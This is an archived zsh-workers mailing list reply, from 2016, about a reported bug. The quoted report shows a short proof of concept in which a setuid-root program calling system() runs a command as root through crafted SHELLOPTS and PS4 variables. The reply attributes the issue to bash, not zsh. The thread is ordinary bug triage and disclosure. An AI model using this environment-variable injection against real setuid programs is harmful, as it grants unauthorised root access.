Zsh Mailing List Archive Messages sorted by: Reverse Date, Date, Thread, Author

Re: BUG: crafting SHELLOPTS and PS4 allows to run arbitrary programs in setuid binaries using system

X-seq: zsh-workers 39471
From: Mateusz Lenik <mlen@xxxxxxx>
To: Daniel Shahaf <d.s@xxxxxxxxxxxxxxxxxx>
Subject: Re: BUG: crafting SHELLOPTS and PS4 allows to run arbitrary programs in setuid binaries using system
Date: Tue, 27 Sep 2016 08:43:46 +0000
Cc: zsh-workers@xxxxxxx
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=mlen.pl; s=google; h=mime-version:references:in-reply-to:from:date:message-id:subject:to :cc; bh=0oZp+qmGNidAZi2bFUiXsy55yKIJWXVyHlw3/3YadpI=; b=LozTAViYkj6fdIGTpvqfQZnwp6eQmG4rUDSX/q2w933DP/WbMs3Atadzs4SUvu9QFz gBUYdVFrk8snjLYBZ4ffMicFEMJ5uidsHSs1ie16IRQr+jmMG9rZtXWvJIVainuBZyMY MK4kVBLNdMzXmAkTw4oNS+4jbkpsNvFMTPWww=
In-reply-to: <20160927075347.GA500@fujitsu.shahaf.local2>
List-help: <mailto:zsh-workers-help@zsh.org>
List-id: Zsh Workers List <zsh-workers.zsh.org>
List-post: <mailto:zsh-workers@zsh.org>
Mailing-list: contact zsh-workers-help@xxxxxxx; run by ezmlm
References: <CALDAOts+rgsuZfABkgVBphvY4CLcUiMLFA4xR0bUXPNxnhcHug@mail.gmail.com> <20160927075347.GA500@fujitsu.shahaf.local2>

On Tue, Sep 27, 2016 at 9:54 AM Daniel Shahaf <d.s@xxxxxxxxxxxxxxxxxx>
wrote:

> Mateusz Lenik wrote on Tue, Sep 27, 2016 at 06:59:18 +0000:
> > % gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }'
> > % sudo chown root:root test
> > % sudo chmod 4755 test
> > % env -i SHELLOPTS=xtrace PS4='$(id)' ./test
> > uid=0(root) gid=... groups=.../bin/date
> > Tue Sep 27 08:49:16 CEST 2016
>
> I can't reproduce that either either 5.0.7 or latest master, even with
> «setopt promptsubst» in effect.  (Does it reproduce in 'zsh -f'?)
>
Thanks for looking into it.
It turned out that I didn't research it thoroughly, sorry about that.

glibc execs /bin/sh, so even when zsh is the root shell, it won't be used.
After pointing /bin/sh link to zsh, it works correctly, so after all it was
that bash bug.

Best,
mlen

References:
- BUG: crafting SHELLOPTS and PS4 allows to run arbitrary programs in setuid binaries using system
  - From: Mateusz Lenik
- Re: BUG: crafting SHELLOPTS and PS4 allows to run arbitrary programs in setuid binaries using system
  - From: Daniel Shahaf

Messages sorted by: Reverse Date, Date, Thread, Author